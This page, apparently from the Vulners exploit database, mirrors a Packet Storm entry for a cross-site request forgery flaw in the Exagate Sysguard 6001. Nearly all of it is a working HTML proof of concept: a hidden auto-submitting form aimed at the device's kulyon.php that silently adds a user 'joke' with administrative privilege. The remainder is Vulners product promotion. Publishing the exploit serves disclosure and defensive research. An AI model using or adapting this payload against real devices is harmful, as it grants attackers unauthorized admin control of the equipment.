Lucene search
K

Exagate Sysguard 6001 Cross Site Request Forgery

🗓️ 20 Mar 2020 00:00:00Reported by Metin Yunus KandemirType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 135 Views

Exagate Sysguard 6001 CSRF Add Admi

Code
`# Exploit Title: Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)  
# Exploit Author: Metin Yunus Kandemir  
# Vendor Homepage: https://www.exagate.com/  
# Software Link: https://www.exagate.com/sysguard-6001  
# Version: SYSGuard 6001  
  
HTML CSRF PoC :  
  
<html>  
<body>  
<form action="http://target/kulyon.php" method="POST">  
<input type="hidden" name="username" value="joke" />  
<input type="hidden" name="password" value="159384" />  
<input type="hidden" name="privilege" value="0" />  
<input type="hidden" name="button" value="Ekle" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation